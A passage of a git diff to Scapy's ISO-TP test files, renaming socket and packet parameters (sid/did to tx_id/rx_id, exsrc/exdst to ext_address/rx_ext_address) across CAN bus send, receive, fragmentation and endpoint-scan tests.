subprocess.Popen(["isotpsend", "-s", "244", "-d", "644", "-x", "ee:aa", iface0], stdin=subprocess.PIPE, universal_newlines=True) p.communicate(message) r = p.returncode @@ -52,7 +52,7 @@ exit_if_no_isotp_module() isotp = ISOTP(data=bytearray(range(1,20))) p = subprocess.Popen(["isotprecv", "-s", "243", "-d", "643", "-b", "3", iface0], stdout=subprocess.PIPE) time.sleep(0.1) -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x643, did=0x243) as s: +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, tx_id=0x643, rx_id=0x243) as s: s.send(isotp) timer = threading.Timer(1, lambda: p.terminate() if p.poll() else p.wait()) @@ -81,7 +81,7 @@ isotp = ISOTP(data=bytearray(range(1,20))) cmd = ["isotprecv", "-s245", "-d645", "-b3", "-x", "ee:aa", iface0] p = subprocess.Popen(cmd, stdout=subprocess.PIPE) time.sleep(0.1) # Give some time for starting reception -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x645, did=0x245, extended_addr=0xaa, extended_rx_addr=0xee) as s: +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, tx_id=0x645, rx_id=0x245, ext_address=0xaa, rx_ext_address=0xee) as s: s.send(isotp) timer = threading.Timer(1, lambda: p.terminate() if p.poll() else p.wait()) @@ -108,13 +108,13 @@ assert not timer.is_alive() = Create ISOTP socket exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) +s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) = Send single frame ISOTP message exit_if_no_isotp_module() with new_can_socket(iface0) as cans: - s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) + s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) s.send(ISOTP(data=dhex("01 02 03 04 05"))) can = cans.sniff(timeout=1, count=1)[0] assert(can.identifier == 0x641) @@ -124,7 +124,7 @@ with new_can_socket(iface0) as cans: = Send single frame ISOTP message Test init with CANSocket exit_if_no_isotp_module() cans = CANSocket(iface0) -s = ISOTPNativeSocket(cans, sid=0x641, did=0x241) +s = ISOTPNativeSocket(cans, tx_id=0x641, rx_id=0x241) s.send(ISOTP(data=dhex("01 02 03 04 05"))) can = cans.sniff(timeout=1, count=1)[0] assert(can.identifier == 0x641) @@ -136,7 +136,7 @@ cans.close() exit_if_no_isotp_module() exception_catched = False try: - s = ISOTPNativeSocket(42, sid=0x641, did=0x241) + s = ISOTPNativeSocket(42, tx_id=0x641, rx_id=0x241) except Scapy_Exception: exception_catched = True @@ -156,7 +156,7 @@ def acker(): with new_can_socket(iface0) as cans: t = Thread(target=acker) t.start() - s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) + s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) evt.wait(timeout=5) s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) can = cans.sniff(timeout=1, count=1)[0] @@ -173,7 +173,7 @@ with new_can_socket(iface0) as cans: = Send a single frame ISOTP message with padding exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) +s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, padding=True) with new_can_socket(iface0) as cans: s.send(ISOTP(data=dhex("01"))) @@ -195,7 +195,7 @@ with new_can_socket(iface0) as cans: thread = Thread(target=acker) thread.start() acker_ready.wait(timeout=5) - s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) + s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, padding=True) s.send(ISOTP(data=dhex("01 02 03 04 05 06 07 08"))) can = cans.sniff(timeout=1, count=1)[0] assert(can.identifier == 0x641) @@ -212,7 +212,7 @@ with new_can_socket(iface0) as cans: = Receive a padded single frame ISOTP message with padding disabled exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=False) +s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, padding=False) with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) res = s.recv() @@ -221,7 +221,7 @@ with new_can_socket(iface0) as cans: = Receive a padded single frame ISOTP message with padding enabled exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) +s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, padding=True) with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("02 05 06 00 00 00 00 00"))) res = s.recv() @@ -230,7 +230,7 @@ with new_can_socket(iface0) as cans: = Receive a non-padded single frame ISOTP message with padding enabled exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) +s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, padding=True) with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("02 05 06"))) res = s.recv() @@ -239,7 +239,7 @@ with new_can_socket(iface0) as cans: = Receive a padded two-frame ISOTP message with padding enabled exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=True) +s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, padding=True) with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) @@ -249,7 +249,7 @@ with new_can_socket(iface0) as cans: = Receive a padded two-frame ISOTP message with padding disabled exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, padding=False) +s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, padding=False) with new_can_socket(iface0) as cans: cans.send(CAN(identifier=0x241, data=dhex("10 09 01 02 03 04 05 06"))) cans.send(CAN(identifier=0x241, data=dhex("21 07 08 09 00 00 00 00"))) @@ -259,33 +259,33 @@ with new_can_socket(iface0) as cans: = Receive a single frame ISOTP message exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) +s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) with new_can_socket(iface0) as cans: cans.send(CAN(identifier = 0x241, data = dhex("05 01 02 03 04 05"))) isotp = s.recv() assert(isotp.data == dhex("01 02 03 04 05")) - assert(isotp.src == 0x641) - assert(isotp.dst == 0x241) - assert(isotp.exsrc == None) - assert(isotp.exdst == None) + assert(isotp.tx_id == 0x641) + assert(isotp.rx_id == 0x241) + assert(isotp.ext_address == None) + assert(isotp.rx_ext_address == None) = Receive a single frame ISOTP message, with extended addressing exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241, extended_addr=0xc0, extended_rx_addr=0xea) +s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241, ext_address=0xc0, rx_ext_address=0xea) with new_can_socket(iface0) as cans: cans.send(CAN(identifier = 0x241, data = dhex("EA 05 01 02 03 04 05"))) isotp = s.recv() assert(isotp.data == dhex("01 02 03 04 05")) - assert(isotp.src == 0x641) - assert(isotp.dst == 0x241) - assert(isotp.exsrc == 0xc0) - assert(isotp.exdst == 0xea) + assert(isotp.tx_id == 0x641) + assert(isotp.rx_id == 0x241) + assert(isotp.ext_address == 0xc0) + assert(isotp.rx_ext_address == 0xea) = Receive a two-frame ISOTP message exit_if_no_isotp_module() -s = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) +s = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) with new_can_socket(iface0) as cans: cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) @@ -294,7 +294,7 @@ with new_can_socket(iface0) as cans: = Receive a two-frame ISOTP message and test python with statement exit_if_no_isotp_module() -with ISOTPNativeSocket(iface0, sid=0x641, did=0x241) as s: +with ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) as s: with new_can_socket(iface0) as cans: cans.send(CAN(identifier = 0x241, data = dhex("10 0B 01 02 03 04 05 06"))) cans.send(CAN(identifier = 0x241, data = dhex("21 07 08 09 10 11"))) @@ -305,7 +305,7 @@ with ISOTPNativeSocket(iface0, sid=0x641, did=0x241) as s: = ISOTP Socket sr1 test exit_if_no_isotp_module() -txSock = ISOTPNativeSocket(iface0, sid=0x123, did=0x321, basecls=ISOTP) +txSock = ISOTPNativeSocket(iface0, tx_id=0x123, rx_id=0x321, basecls=ISOTP) txmsg = ISOTP(b'\x11\x22\x33') rx2 = None @@ -454,10 +454,10 @@ assert(succ) = bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package forwarding vcan1 exit_if_no_isotp_module() -isoTpSocket0 = ISOTPNativeSocket(iface0, sid=0x241, did=0x641) -isoTpSocket1 = ISOTPNativeSocket(iface1, sid=0x641, did=0x241) -bSocket0 = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) -bSocket1 = ISOTPNativeSocket(iface1, sid=0x241, did=0x641) +isoTpSocket0 = ISOTPNativeSocket(iface0, tx_id=0x241, rx_id=0x641) +isoTpSocket1 = ISOTPNativeSocket(iface1, tx_id=0x641, rx_id=0x241) +bSocket0 = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) +bSocket1 = ISOTPNativeSocket(iface1, tx_id=0x241, rx_id=0x641) bridgeStarted = threading.Event() def bridge(): @@ -491,10 +491,10 @@ assert(bSucc) = bridge and sniff with isotp native sockets set up vcan0 and vcan1 for package change to vcan1 exit_if_no_isotp_module() -isoTpSocket0 = ISOTPNativeSocket(iface0, sid=0x241, did=0x641) -isoTpSocket1 = ISOTPNativeSocket(iface1, sid=0x641, did=0x241) -bSocket0 = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) -bSocket1 = ISOTPNativeSocket(iface1, sid=0x241, did=0x641) +isoTpSocket0 = ISOTPNativeSocket(iface0, tx_id=0x241, rx_id=0x641) +isoTpSocket1 = ISOTPNativeSocket(iface1, tx_id=0x641, rx_id=0x241) +bSocket0 = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) +bSocket1 = ISOTPNativeSocket(iface1, tx_id=0x241, rx_id=0x641) bSucc = False @@ -532,10 +532,10 @@ exit_if_no_isotp_module() bSucc = False -isoTpSocket0 = ISOTPNativeSocket(iface0, sid=0x241, did=0x641) -isoTpSocket1 = ISOTPNativeSocket(iface1, sid=0x641, did=0x241) -bSocket0 = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) -bSocket1 = ISOTPNativeSocket(iface1, sid=0x241, did=0x641) +isoTpSocket0 = ISOTPNativeSocket(iface0, tx_id=0x241, rx_id=0x641) +isoTpSocket1 = ISOTPNativeSocket(iface1, tx_id=0x641, rx_id=0x241) +bSocket0 = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) +bSocket1 = ISOTPNativeSocket(iface1, tx_id=0x241, rx_id=0x641) bridgeStarted = threading.Event() def bridge(): @@ -576,10 +576,10 @@ exit_if_no_isotp_module() bSucc = False -isoTpSocket0 = ISOTPNativeSocket(iface0, sid=0x241, did=0x641) -isoTpSocket1 = ISOTPNativeSocket(iface1, sid=0x641, did=0x241) -bSocket0 = ISOTPNativeSocket(iface0, sid=0x641, did=0x241) -bSocket1 = ISOTPNativeSocket(iface1, sid=0x241, did=0x641) +isoTpSocket0 = ISOTPNativeSocket(iface0, tx_id=0x241, rx_id=0x641) +isoTpSocket1 = ISOTPNativeSocket(iface1, tx_id=0x641, rx_id=0x241) +bSocket0 = ISOTPNativeSocket(iface0, tx_id=0x641, rx_id=0x241) +bSocket1 = ISOTPNativeSocket(iface1, tx_id=0x241, rx_id=0x641) bridgeStarted = threading.Event() def bridge(): diff --git a/test/contrib/isotp_packet.uts b/test/contrib/isotp_packet.uts index 6b3c6708767..191b251f047 100644 --- a/test/contrib/isotp_packet.uts +++ b/test/contrib/isotp_packet.uts @@ -25,39 +25,39 @@ else: = Creation of an empty ISOTP packet p = ISOTP() assert(p.data == b"") -assert(p.src is None and p.dst is None and p.exsrc is None and p.exdst is None) +assert(p.tx_id is None and p.rx_id is None and p.ext_address is None and p.rx_ext_address is None) assert(bytes(p) == b"") -= Creation of a simple ISOTP packet with src -p = ISOTP(b"eee", src=0x241) -assert(p.src == 0x241) += Creation of a simple ISOTP packet with tx_id +p = ISOTP(b"eee", tx_id=0x241) +assert(p.tx_id == 0x241) assert(p.data == b"eee") assert(bytes(p) == b"eee") -= Creation of a simple ISOTP packet with exsrc -p = ISOTP(b"eee", exsrc=0x41) -assert(p.exsrc == 0x41) += Creation of a simple ISOTP packet with ext_address +p = ISOTP(b"eee", ext_address=0x41) +assert(p.ext_address == 0x41) assert(p.data == b"eee") assert(bytes(p) == b"eee") -= Creation of a simple ISOTP packet with dst -p = ISOTP(b"eee", dst=0x241) -assert(p.dst == 0x241) += Creation of a simple ISOTP packet with rx_id +p = ISOTP(b"eee", rx_id=0x241) +assert(p.rx_id == 0x241) assert(p.data == b"eee") assert(bytes(p) == b"eee") -= Creation of a simple ISOTP packet with exdst -p = ISOTP(b"eee", exdst=0x41) -assert(p.exdst == 0x41) += Creation of a simple ISOTP packet with rx_ext_address +p = ISOTP(b"eee", rx_ext_address=0x41) +assert(p.rx_ext_address == 0x41) assert(p.data == b"eee") assert(bytes(p) == b"eee") -= Creation of a simple ISOTP packet with src, dst, exsrc, exdst -p = ISOTP(b"eee", src=1, dst=2, exsrc=3, exdst=4) -assert(p.dst == 2) -assert(p.exdst == 4) -assert(p.src == 1) -assert(p.exsrc == 3) += Creation of a simple ISOTP packet with tx_id, rx_id, ext_address, rx_ext_address +p = ISOTP(b"eee", tx_id=1, rx_id=2, ext_address=3, rx_ext_address=4) +assert(p.rx_id == 2) +assert(p.rx_ext_address == 4) +assert(p.tx_id == 1) +assert(p.ext_address == 3) assert(p.data == b"eee") assert(bytes(p) == b"eee") @@ -69,38 +69,38 @@ assert(p.answers(r)) assert(not p.answers(Raw())) -= Creation of a simple ISOTP packet with src validation error += Creation of a simple ISOTP packet with tx_id validation error ex = False try: - p = ISOTP(b"eee", src=0x1000000000, dst=2, exsrc=3, exdst=4) + p = ISOTP(b"eee", tx_id=0x1000000000, rx_id=2, ext_address=3, rx_ext_address=4) except Scapy_Exception: ex = True assert ex -= Creation of a simple ISOTP packet with dst validation error += Creation of a simple ISOTP packet with rx_id validation error ex = False try: - p = ISOTP(b"eee", src=0x10, dst=0x20000000000, exsrc=3, exdst=4) + p = ISOTP(b"eee", tx_id=0x10, rx_id=0x20000000000, ext_address=3, rx_ext_address=4) except Scapy_Exception: ex = True assert ex -= Creation of a simple ISOTP packet with exsrc validation error += Creation of a simple ISOTP packet with ext_address validation error ex = False try: - p = ISOTP(b"eee", src=0x10, dst=2, exsrc=3000, exdst=4) + p = ISOTP(b"eee", tx_id=0x10, rx_id=2, ext_address=3000, rx_ext_address=4) except Scapy_Exception: ex = True assert ex -= Creation of a simple ISOTP packet with exdst validation error += Creation of a simple ISOTP packet with rx_ext_address validation error ex = False try: - p = ISOTP(b"eee", src=0x10, dst=2, exsrc=30, exdst=400) + p = ISOTP(b"eee", tx_id=0x10, rx_id=2, ext_address=30, rx_ext_address=400) except Scapy_Exception: ex = True @@ -298,7 +298,7 @@ assert(len(fragments) == 1) assert(fragments[0].data == b"\0") = Fragment a 4 bytes long ISOTP message -fragments = ISOTP(b"data", src=0x241).fragment() +fragments = ISOTP(b"data", tx_id=0x241).fragment() assert(len(fragments) == 1) assert(isinstance(fragments[0], CAN)) fragment = CAN(bytes(fragments[0])) @@ -308,7 +308,7 @@ assert(fragment.length == 5) assert(fragment.reserved == 0) = Fragment a 4 bytes long ISOTP message extended -fragments = ISOTP(b"data", dst=0x1fff0000).fragment() +fragments = ISOTP(b"data", rx_id=0x1fff0000).fragment() assert(len(fragments) == 1) assert(isinstance(fragments[0], CAN)) fragment = CAN(bytes(fragments[0])) @@ -318,7 +318,7 @@ assert(fragment.reserved == 0) assert(fragment.flags == 4) = Fragment a 8 bytes long ISOTP message extended -fragments = ISOTP(b"datadata", dst=0x1fff0000).fragment() +fragments = ISOTP(b"datadata", rx_id=0x1fff0000).fragment() assert(len(fragments) == 2) assert(isinstance(fragments[0], CAN)) fragment = CAN(bytes(fragments[0])) @@ -344,20 +344,20 @@ assert(fragments[0].data == b"\x10\x08abcdef") assert(fragments[1].data == b"\x21gh") = Fragment an ISOTP message with extended addressing -isotp = ISOTP(b"abcdef", exdst=ord('A')) +isotp = ISOTP(b"abcdef", rx_ext_address=ord('A')) fragments = isotp.fragment() assert(len(fragments) == 1) assert(fragments[0].data == b"A\x06abcdef") = Fragment a 7 bytes ISOTP message with destination identifier -isotp = ISOTP(b"abcdefg", dst=0x64f) +isotp = ISOTP(b"abcdefg", rx_id=0x64f) fragments = isotp.fragment() assert(len(fragments) == 1) assert(fragments[0].data == b"\x07abcdefg") assert(fragments[0].identifier == 0x64f) = Fragment a 16 bytes ISOTP message with extended addressing -isotp = ISOTP(b"abcdefghijklmnop", dst=0x64f, exdst=ord('A')) +isotp = ISOTP(b"abcdefghijklmnop", rx_id=0x64f, rx_ext_address=ord('A')) fragments = isotp.fragment() assert(len(fragments) == 3) assert(fragments[0].data == b"A\x10\x10abcde") @@ -369,7 +369,7 @@ assert(fragments[2].identifier == 0x64f) = Fragment a huge ISOTP message, 4997 bytes long data = b"T" * 4997 -isotp = ISOTP(b"T" * 4997, dst=0x345) +isotp = ISOTP(b"T" * 4997, rx_id=0x345) fragments = isotp.fragment() assert(len(fragments) == 715) assert(fragments[0].data == dhex("10 00 00 00 13 85") + b"TT") @@ -382,7 +382,7 @@ fragments = [CAN(identifier=0x641, data=b"\x04test")] isotp = ISOTP.defragment(fragments) isotp.show() assert(isotp.data == b"test") -assert(isotp.dst == 0x641) +assert(isotp.rx_id == 0x641) = Defragment non ISOTP message fragments = [CAN(identifier=0x641, data=b"\xa4test")] @@ -393,7 +393,7 @@ assert isotp is None fragments = [CAN(identifier=0x641, data=b"\x04test"), CAN(identifier=0x642, data=b"\x04test")] isotp = ISOTP.defragment(fragments) assert(isotp.data == b"test") -assert(isotp.dst == 0x641) +assert(isotp.rx_id == 0x641) = Defragment exception fragments = [] @@ -424,11 +424,11 @@ fragments = [ isotp = ISOTP.defragment(fragments) isotp.show() assert(isotp.data == dhex("61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70")) -assert(isotp.dst == 0x641) -assert(isotp.exdst == 0x41) +assert(isotp.rx_id == 0x641) +assert(isotp.rx_ext_address == 0x41) = Check if fragmenting a message and defragmenting it back yields the original message -isotp1 = ISOTP(b"abcdef", exdst=ord('A')) +isotp1 = ISOTP(b"abcdef", rx_ext_address=ord('A')) fragments = isotp1.fragment() isotp2 = ISOTP.defragment(fragments) isotp2.show() @@ -440,13 +440,13 @@ isotp2 = ISOTP.defragment(fragments) isotp2.show() assert(isotp1 == isotp2) -isotp1 = ISOTP(b"abcdefghijklmnop", exdst=ord('A')) +isotp1 = ISOTP(b"abcdefghijklmnop", rx_ext_address=ord('A')) fragments = isotp1.fragment() isotp2 = ISOTP.defragment(fragments) isotp2.show() assert(isotp1 == isotp2) -isotp1 = ISOTP(b"T"*5000, exdst=ord('A')) +isotp1 = ISOTP(b"T"*5000, rx_ext_address=ord('A')) fragments = isotp1.fragment() isotp2 = ISOTP.defragment(fragments) isotp2.show() @@ -457,9 +457,9 @@ fragments = [CAN(identifier=0x641, data=dhex("02 01 AA"))] isotp = ISOTP.defragment(fragments, False) isotp.show() assert(isotp.data == dhex("01 AA")) -assert(isotp.exdst == None) +assert(isotp.rx_ext_address == None) isotpex = ISOTP.defragment(fragments, True) isotpex.show() assert(isotpex.data == dhex("AA")) -assert(isotpex.exdst == 0x02) +assert(isotpex.rx_ext_address == 0x02) diff --git a/test/contrib/isotp_soft_socket.uts b/test/contrib/isotp_soft_socket.uts index 44ec0dc54e7..66152e8f0e5 100644 --- a/test/contrib/isotp_soft_socket.uts +++ b/test/contrib/isotp_soft_socket.uts @@ -46,10 +46,10 @@ with TestSocket(CAN) as s, TestSocket(CAN) as tx_sock: sniffed = sniff(opened_socket=s, session=ISOTPSession, timeout=1, count=1) assert sniffed[0]['ISOTP'].data == bytearray(range(1, 0x29)) -assert(sniffed[0]['ISOTP'].src == 0x641) -assert(sniffed[0]['ISOTP'].exsrc is 0xEA) -assert(sniffed[0]['ISOTP'].dst == 0x241) -assert(sniffed[0]['ISOTP'].exdst is 0xEA) +assert(sniffed[0]['ISOTP'].tx_id == 0x641) +assert(sniffed[0]['ISOTP'].ext_address is 0xEA) +assert(sniffed[0]['ISOTP'].rx_id == 0x241) +assert(sniffed[0]['ISOTP'].rx_ext_address is 0xEA) + ISOTPSoftSocket tests @@ -330,10 +330,10 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241) as cans.send(CAN(identifier = 0x241, data = dhex("05 01 02 03 04 05"))) isotp = s.sniff(count=1, timeout=1)[0] assert(isotp.data == dhex("01 02 03 04 05")) - assert(isotp.src == 0x641) - assert(isotp.dst == 0x241) - assert(isotp.exsrc == None) - assert(isotp.exdst == None) + assert(isotp.tx_id == 0x641) + assert(isotp.rx_id == 0x241) + assert(isotp.ext_address == None) + assert(isotp.rx_ext_address == None) = Receive a single frame ISOTP message, with extended addressing @@ -343,10 +343,10 @@ with TestSocket(CAN) as isocan, ISOTPSoftSocket(isocan, sid=0x641, did=0x241, ex cans.send(CAN(identifier = 0x241, data = dhex("EA 05 01 02 03 04 05"))) isotp = s.sniff(count=1, timeout=1)[0] assert(isotp.data == dhex("01 02 03 04 05")) - assert(isotp.src == 0x641) - assert(isotp.dst == 0x241) - assert(isotp.exsrc == 0xc0) - assert(isotp.exdst == 0xea) + assert(isotp.tx_id == 0x641) + assert(isotp.rx_id == 0x241) + assert(isotp.ext_address == 0xc0) + assert(isotp.rx_ext_address == 0xea) = Receive frames from CandumpReader @@ -375,11 +375,11 @@ with ISOTPSoftSocket(CandumpReader(candump_fd), sid=0x241, did=0x541, listen_onl assert(len(pkts) == 6) isotp = pkts[0] print(repr(isotp)) - print(hex(isotp.src)) - print(hex(isotp.dst)) + print(hex(isotp.tx_id)) + print(hex(isotp.rx_id)) assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) - assert(isotp.src == 0x241) - assert(isotp.dst == 0x541) + assert(isotp.tx_id == 0x241) + assert(isotp.rx_id == 0x541) = Receive frames from CandumpReader with ISOTPSniffer without extended addressing candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA @@ -402,11 +402,11 @@ candump_fd = BytesIO(b''' vcan0 541 [8] 10 0A DE AD BE EF AA AA vcan0 241 [3] 30 00 00 vcan0 541 [5] 21 AA AA AA AA''') -pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1, session_kwargs={"use_ext_addr": False}) +pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, timeout=1, session_kwargs={"use_ext_address": False}) assert(len(pkts) == 6) isotp = pkts[0] assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) -assert (isotp.dst == 0x541) +assert (isotp.rx_id == 0x541) = Receive frames from CandumpReader with ISOTPSniffer * all flow control frames are detected as single frame with extended address @@ -435,10 +435,10 @@ pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, time assert(len(pkts) == 12) isotp = pkts[1] assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) -assert (isotp.dst == 0x541) +assert (isotp.rx_id == 0x541) isotp = pkts[0] assert(isotp.data == dhex("")) -assert (isotp.dst == 0x241) +assert (isotp.rx_id == 0x241) = Receive frames from CandumpReader with ISOTPSniffer and count * all flow control frames are detected as single frame with extended address @@ -467,10 +467,10 @@ pkts = sniff(opened_socket=CandumpReader(candump_fd), session=ISOTPSession, time assert(len(pkts) == 2) isotp = pkts[1] assert(isotp.data == dhex("DE AD BE EF AA AA AA AA AA AA")) -assert (isotp.dst == 0x541) +assert (isotp.rx_id == 0x541) isotp = pkts[0] assert(isotp.data == dhex("")) -assert (isotp.dst == 0x241) +assert (isotp.rx_id == 0x241) = ISOTPSession tests diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 41b9f6eda52..c531b7a5af7 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -303,9 +303,9 @@ def test_isotpscan_code(sniff_time=0.02): thread1.join(timeout=10) thread2.join(timeout=10) thread_noise.join(timeout=10) - s1 = "ISOTPSocket(can0, sid=0x602, did=0x702, " \ + s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, " \ "padding=False, basecls=ISOTP)\n" - s2 = "ISOTPSocket(can0, sid=0x603, did=0x703, " \ + s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, " \ "padding=False, basecls=ISOTP)\n" print(result) assert s1 in result @@ -342,7 +342,7 @@ def test_isotpscan_code_noise(sniff_time=0.02): thread1.join(timeout=10) thread2.join(timeout=10) thread_noise.join(timeout=10) - s2 = "ISOTPSocket(can0, sid=0x603, did=0x703, " \ + s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, " \ "padding=False, basecls=ISOTP)\n" print(result) assert s2 in result @@ -383,10 +383,10 @@ def test_extended_isotpscan_code(sniff_time=0.02): thread1.join(timeout=10) thread2.join(timeout=10) thread_noise.join(timeout=10) - s1 = "ISOTPSocket(can0, sid=0x602, did=0x702, padding=False, " \ - "extended_addr=0x22, extended_rx_addr=0x11, basecls=ISOTP)" - s2 = "ISOTPSocket(can0, sid=0x603, did=0x703, padding=False, " \ - "extended_addr=0x22, extended_rx_addr=0x11, basecls=ISOTP)" + s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, padding=False, " \ + "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" + s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, padding=False, " \ + "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" print(result) assert s1 in result assert s2 in result @@ -428,10 +428,10 @@ def test_extended_isotpscan_code_extended_can_id(sniff_time=0.02): thread1.join(timeout=10) thread2.join(timeout=10) thread_noise.join(timeout=10) - s1 = "ISOTPSocket(can0, sid=0x1ffff602, did=0x1ffff702, padding=False, " \ - "extended_addr=0x22, extended_rx_addr=0x11, basecls=ISOTP)" - s2 = "ISOTPSocket(can0, sid=0x1ffff603, did=0x1ffff703, padding=False, " \ - "extended_addr=0x22, extended_rx_addr=0x11, basecls=ISOTP)" + s1 = "ISOTPSocket(can0, tx_id=0x1ffff602, rx_id=0x1ffff702, padding=False, " \ + "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" + s2 = "ISOTPSocket(can0, tx_id=0x1ffff603, rx_id=0x1ffff703, padding=False, " \ + "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" print(result) assert s1 in result assert s2 in result @@ -461,7 +461,7 @@ def test_isotpscan_none(sniff_time=0.02): sniff_time=sniff_time, noise_listen_time=sniff_time * 6, verbose=True) - result = sorted(result, key=lambda x: x.src) + result = sorted(result, key=lambda x: x.tx_id) with new_can_socket0() as cans: cans.send(CAN(identifier=0x601, data=b'\x01\xaa')) cans.send(CAN(identifier=0x602, data=b'\x01\xaa')) @@ -478,10 +478,10 @@ def test_isotpscan_none(sniff_time=0.02): thread2.join(timeout=10) thread_noise.join(timeout=10) assert len(result) == 2 - assert 0x602 == result[0].src - assert 0x702 == result[0].dst - assert 0x603 == result[1].src - assert 0x703 == result[1].dst + assert 0x602 == result[0].tx_id + assert 0x702 == result[0].rx_id + assert 0x603 == result[1].tx_id + assert 0x703 == result[1].rx_id for s in result: del s @@ -510,7 +510,7 @@ def test_isotpscan_none_2(sniff_time=0.02): sniff_time=sniff_time, noise_listen_time=sniff_time * 6, verbose=True) - result = sorted(result, key=lambda x: x.src) + result = sorted(result, key=lambda x: x.tx_id) with new_can_socket0() as cans: cans.send(CAN(identifier=0x609, data=b'\x01\xaa')) cans.send(CAN(identifier=0x608, data=b'\x01\xaa')) @@ -526,10 +526,10 @@ def test_isotpscan_none_2(sniff_time=0.02): thread2.join(timeout=10) thread_noise.join(timeout=10) assert len(result) == 2 - assert 0x608 == result[0].src - assert 0x708 == result[0].dst - assert 0x609 == result[1].src - assert 0x709 == result[1].dst + assert 0x608 == result[0].tx_id + assert 0x708 == result[0].rx_id + assert 0x609 == result[1].tx_id + assert 0x709 == result[1].rx_id for s in result: del s @@ -561,7 +561,7 @@ def test_extended_isotpscan_none(sniff_time=0.02): sniff_time=sniff_time, noise_listen_time=sniff_time * 6, verbose=True) - result = sorted(result, key=lambda x: x.src) + result = sorted(result, key=lambda x: x.tx_id) with new_can_socket0() as cans: cans.send(CAN(identifier=0x602, data=b'\x22\x01\xaa')) cans.send(CAN(identifier=0x603, data=b'\x22\x01\xaa')) @@ -583,14 +583,14 @@ def test_extended_isotpscan_none(sniff_time=0.02): thread2.join(timeout=10) thread_noise.join(timeout=10) assert len(result) == 2 - assert 0x602 == result[0].src - assert 0x702 == result[0].dst - assert 0x22 == result[0].exsrc - assert 0x11 == result[0].exdst - assert 0x603 == result[1].src - assert 0x703 == result[1].dst - assert 0x22 == result[1].exsrc - assert 0x11 == result[1].exdst + assert 0x602 == result[0].tx_id + assert 0x702 == result[0].rx_id + assert 0x22 == result[0].ext_address + assert 0x11 == result[0].rx_ext_address + assert 0x603 == result[1].tx_id + assert 0x703 == result[1].rx_id + assert 0x22 == result[1].ext_address + assert 0x11 == result[1].rx_ext_address for s in result: del s @@ -624,7 +624,7 @@ def 